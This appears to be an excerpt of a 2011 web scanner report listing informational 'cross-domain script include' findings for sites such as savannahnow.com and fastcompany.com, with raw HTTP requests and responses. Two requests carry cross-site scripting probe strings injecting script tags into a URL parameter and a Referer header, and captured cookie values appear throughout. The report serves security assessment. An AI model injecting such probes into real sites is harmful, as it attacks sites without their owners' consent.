User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 12 Sep 2011 12:48:34 GMT
Server: cafe
Cache-Control: private
Content-Length: 3878
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110831/r20110719/abg.js"></script>
...[SNIP]...

12.8. http://mydirtbike.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mydirtbike.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: mydirtbike.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:43 GMT
Server: Apache/2.2.17 (Ubuntu)
X-Powered-By: PHP/5.3.5-1ubuntu7.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 12 Sep 2011 12:48:43 GMT
Cache-Control: must-revalidate
Connection: close
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 49947


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="ht
...[SNIP]...
<meta name="google-site-verification" content="0TXFaXuBY3o7yV8rq4oQs6GZQvDyLlFeRp2dulB2YxQ" />
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

12.9. http://player.vimeo.com/video/19872101

Summary

Severity:   Information
Confidence:   Certain
Host:   http://player.vimeo.com
Path:   /video/19872101

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /video/19872101?title=0&byline=0&portrait=0 HTTP/1.1
Host: player.vimeo.com
Proxy-Connection: keep-alive
Referer: http://www.cargoh.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=256147786.803795514.1314813682.1314847150.1314978007.3; __utmz=256147786.1314978007.3.3.utmcsr=blog.sipvicious.org|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:49:29 GMT
Server: Apache
X-Powered-By: PHP/5.3.5-0.dotdeb.0
X-Server: 10.90.128.119
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Expires: Fri, 25 Feb 1983 09:30:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 8996
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Cargoh Artist Profile - Indigo</title><!--[if lt IE 9]><style>.a.d .z {display: block;}.a.d .bj {background: #000;filter: alpha(opacit
...[SNIP]...
<link rel="stylesheet" href="http://a.vimeocdn.com/p/1.4.0/css/player.core.opt.css"><script src="http://a.vimeocdn.com/p/1.4.0/js/player.core.opt.js"></script>
...[SNIP]...

12.10. http://research.yahoo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://research.yahoo.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: research.yahoo.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:42 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 12 Sep 2011 12:48:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, private
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39475

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title>Yahoo
...[SNIP]...
<link rel="shortcut icon" href="/themes/yresearch/favicon.ico" type="image/x-icon" />
<script type="text/javascript" src="http://yui.yahooapis.com/2.3.1/build/yahoo-dom-event/yahoo-dom-event.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.3.1/build/connection/connection-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.3.1/build/autocomplete/autocomplete-min.js"></script>
<script src="http://yui.yahooapis.com/3.1.1/build/yui/yui.js"></script>
...[SNIP]...
<body>
<script type="text/javascript" src="http://yui.yahooapis.com/3.1.1/build/yui/yui-min.js"></script>
...[SNIP]...
</script><script charset='utf-8' type='text/javascript' src='http://l.yimg.com/zz/combo?kx/ucs/common/js/1/setup-min.js&kx/ucs/sts/js/83/skip-min.js&kx/ucs/menu_utils/js/134/menu_utils-min.js&kx/ucs/username/js/33/user_menu-min.js&kx/ucs/help/js/35/help_menu-min.js&kx/ucs/utility_link/js/15/utility_menu-min.js&kx/ucs/common/js/127/logo_debug-min.js&kx/ucs/homepage/js/124/homepage-min.js&kx/ucs/search/js/169/search-min.js'></script>
...[SNIP]...

12.11. http://savannahnow.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://savannahnow.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: savannahnow.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Mon, 12 Sep 2011 12:43:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
X-Drupal-Cache: MISS
Expires: Mon, 12 Sep 2011 12:48:52 GMT
Last-Modified: Mon, 12 Sep 2011 12:43:52 +0000
Cache-Control: must-revalidate, max-age=0, s-maxage=300
ETag: "1315831432"-gzip
Vary: Accept-Encoding
Content-Length: 149668
Content-Type: text/html; charset=utf-8
Age: 273
X-Cache: HIT from sms3.morris.com
X-Cache-Lookup: HIT from sms3.morris.com:3128
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
</style><script type="text/javascript" src="http://www.zvents.com/misc/widgets/9585.js?63623"></script>
...[SNIP]...
<!-- start BigDoor quest bar -->
<script type="text/javascript" src="http://js.bigdoor.com/branches/release/gambit/load.min.js"></script>
...[SNIP]...

12.12. http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.cssca685

Summary

Severity:   Information
Confidence:   Certain
Host:   http://savannahnow.com
Path:   /sites/all/modules/morris/yca_plugin/yahoo.cssca685

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sites/all/modules/morris/yca_plugin/yahoo.cssca685 HTTP/1.1
Host: savannahnow.com
Proxy-Connection: keep-alive
Referer: http://cm.npc-morris.overture.com/js_1_0/?config=9472395290&type=home_page&ctxtId=home_page&source=npc_morris_savannahmorningnews_t2_ctxt&adwd=420&adht=150&ctxtUrl=http%3A//savannahnow.com/&css_url=http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.cssca685%22%3E%3Cscript%3Ealert(1)%3C/script%3E7a61d61a441&tg=1&bg=FFFFFF&bc=FFFFFF&refUrl=http%3A//drupal.org/cases&du=1&cb=1315849723547
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: zvents_tracker_sid=13158497232050.9525420391000807; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=222803225.1251345904.1315849732.1315849732.1315849732.1; __utmb=222803225.4.10.1315849732; __utmc=222803225; __utmz=222803225.1315849732.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; bd-local=fb-id=1B3C6937-8DDC-4B7E-95C5-7878A957141E; _chartbeat2=mu28j07dwufmztf2.1315849749723; iePersistentData_Pencil_Expand_New_129534=1

Response

HTTP/1.0 404 Not Found
Date: Mon, 12 Sep 2011 12:59:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
X-Drupal-Cache: MISS
Expires: Mon, 12 Sep 2011 13:04:58 GMT
Last-Modified: Mon, 12 Sep 2011 12:59:58 +0000
Cache-Control: must-revalidate, max-age=0, s-maxage=300
ETag: "1315832398"-gzip
Vary: Accept-Encoding
Content-Length: 79084
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sms8.morris.com
X-Cache-Lookup: MISS from sms8.morris.com:3128
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<div style="padding-left:15px;">
       <script type="text/javascript" src="http://www.zvents.com/misc/widgets/9445.js?63623"></script>
...[SNIP]...
<!-- start BigDoor quest bar -->
<script type="text/javascript" src="http://js.bigdoor.com/branches/release/gambit/load.min.js"></script>
...[SNIP]...

12.13. http://seg.sharethis.com/getSegment.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /getSegment.php?purl=http%3A%2F%2Fwww.dome9.com%2F&jsref=&rnd=1315849265708 HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.dome9.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Mon, 12 Sep 2011 12:40:55 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 4781


           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
           
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...

12.14. http://view.atdmt.com/CNT/iview/334302974/direct/01/1829737

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /CNT/iview/334302974/direct/01/1829737

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /CNT/iview/334302974/direct/01/1829737?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/y%3B243066172%3B0-0%3B0%3B42089989%3B3454-728/90%3B42929988/42947775/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3f HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; TOptOut=1; ach00=eb2a/1c72:ec40/2f33; ach01=da2c1b5/1c72/e2f178b/eb2a/4e67d23e:da2c0cc/1c72/85c9f4b/eb2a/4e67d832:ca9bfb6/2f33/14f1ae7d/ec40/4e67d8e2

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Mon, 12 Sep 2011 12:47:58 GMT
Connection: close
Content-Length: 7028

<html><head><title>ATT_Potter_70_728x90_v2</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0p
...[SNIP]...
<span id="te-clearads-js-abs01cont19"><script type="text/javascript" src="http://choices.truste.com/ca?pid=mec01&aid=abs01&cid=0811abs728x90&c=abs01cont19&w=728&h=90"></script>
...[SNIP]...

12.15. http://view.atdmt.com/CNT/iview/334302974/direct/01/4245069

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /CNT/iview/334302974/direct/01/4245069

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /CNT/iview/334302974/direct/01/4245069?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/y%3B243066172%3B0-0%3B0%3B42089989%3B3454-728/90%3B42929988/42947775/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3f HTTP/1.1
Host: view.atdmt.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: AA002=1311365777-4076437; MUID=360F843730F542A7A6E2E0ACB7BADB9D; ach00=e2ff/25d1:233cf/25d1:ceda/2b2a4:66c2/2b2a3; ach01=d518598/25d1/145a59c2/e2ff/4e3f43a9:d75a0d4/25d1/13ed2747/233cf/4e496158:d3ff520/2b2a4/13cf9a34/ceda/4e6039d7:d4250f2/2b2a3/13d2744e/66c2/4e603a12; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b9f&W=1; NAP=V=1.9&E=b45&C=fwpnHGQ2X_czDvTIj3ESgREE63mN7SiurD-8ETgQspHQSOUuQ0Sfog&W=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Mon, 12 Sep 2011 13:06:09 GMT
Connection: close
Content-Length: 7033

<html><head><title>ATT_NoImage_70_728x90_v2</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0
...[SNIP]...
<span id="te-clearads-js-abs01cont19"><script type="text/javascript" src="http://choices.truste.com/ca?pid=mec01&aid=abs01&cid=0811abs728x90&c=abs01cont19&w=728&h=90"></script>
...[SNIP]...

12.16. http://widget.newsinc.com/_fw/Savannah/toppicks_savannah_top.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widget.newsinc.com
Path:   /_fw/Savannah/toppicks_savannah_top.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_fw/Savannah/toppicks_savannah_top.html HTTP/1.1
Host: widget.newsinc.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: 1Ss6mZtSFBOr+ddLUpdq/3jVqTjjBulz3PNOFkOOsW3JglEdTWsOrhGN98B24yo6
x-amz-request-id: 16FACE70BEA024DA
Date: Mon, 12 Sep 2011 12:48:42 GMT
x-amz-meta-cb-modifiedtime: Thu, 14 Jul 2011 20:45:32 GMT
Last-Modified: Thu, 14 Jul 2011 20:56:00 GMT
ETag: "f1779351a10904cc817b410a56ec86c3"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 9585
Server: AmazonS3

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>NDN Top Picks Widge
...[SNIP]...
</script>
<script type="text/javascript" src="http://pixel.quantserve.com/api/segments.json?a=p-573scDfDoUH6o&callback=qcCallback"></script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

12.17. http://www.digitaldollhouse.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.digitaldollhouse.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.digitaldollhouse.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 12 Sep 2011 12:50:25 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.5
Last-Modified: Mon, 12 Sep 2011 12:50:05 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315831805"
Content-Length: 20260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" la
...[SNIP]...
</script>
<script src="http://static.woopra.com/js/woopra.v2.js" type="text/javascript"></script>
...[SNIP]...
<!-- Begin: 4q.iperceptions.com --><script src="http://4qinvite.4q.iperceptions.com/1.aspx?sdfc=db35e419-4469-64f48812-f81a-4e4c-930c-5aa18d636b5f&lID=1&loc=4Q-WEB2" type="text/javascript" defer="defer" ></script>
...[SNIP]...

12.18. http://www.dome9.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dome9.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.dome9.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=31536000
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.17
X-Pingback: http://www.dome9.com/xmlrpc.php
X-Powered-By: ASP.NET
Date: Mon, 12 Sep 2011 12:40:45 GMT
Content-Length: 16467

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<title>Dome9 ... Secure your Cloud | VPS, Dedicated, Cloud and EC2 Security</title>
<link rel="stylesheet" type="tex
...[SNIP]...
</script>
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.js?ver=1.4'></script>
...[SNIP]...
</script><script charset="utf-8" type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...

12.19. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /plugins/likebox.php?id=9665781619&width=300&connections=10&stream=false&header=true&height=287 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.observer.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.182.118
X-Cnection: close
Date: Mon, 12 Sep 2011 12:48:09 GMT
Content-Length: 13284

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/QcD8XaevqyL.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/jMxYWoMkQmY.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/zqPZ0y028IT.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/s9CzvuREOy5.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js"></script>
...[SNIP]...

12.20. http://www.fastcompany.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fastcompany.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.fastcompany.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:47:50 GMT
Server: VoxCAST
Last-Modified: Mon, 12 Sep 2011 12:47:50 GMT
X-Powered-By: PHP/5.2.14
X-Drupal-Cache: HIT
Cache-Control: max-age=0, s-maxage=1200, store, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 13:08:05 GMT
Etag: "1315831685-1"
Vary: Cookie,Accept-Encoding
X-Served-By: daa-www014
X-Cache: HIT from VoxCAST
Age: 1
Content-Length: 67394
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
...[SNIP]...
<!-- START REDARIL-->
<SCRIPT type="text/javascript" language="JavaScript" src="http://p0.raasnet.com/partners/dfp.js"></SCRIPT>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

12.21. http://www.mtv.co.uk/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.2.6
Vary: User-Agent
Vary: Accept-Encoding
Vary: User-Agent
Debug: lnioxp008wuk
ETag: "a01be5fcfc2aae272af84e020237ac98"
Pragma: no-cache
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Date: Mon, 12 Sep 2011 12:49:38 GMT
Content-Length: 89363
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
<!-- /script -->
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mtvuk"></script>
...[SNIP]...
<div class="content"><script src="http://widgets3.flux.com/Loader" type="text/javascript" id="0BFCFFFF000916CC0002FFFFFC0B"></script>
...[SNIP]...
<!-- CODA -->
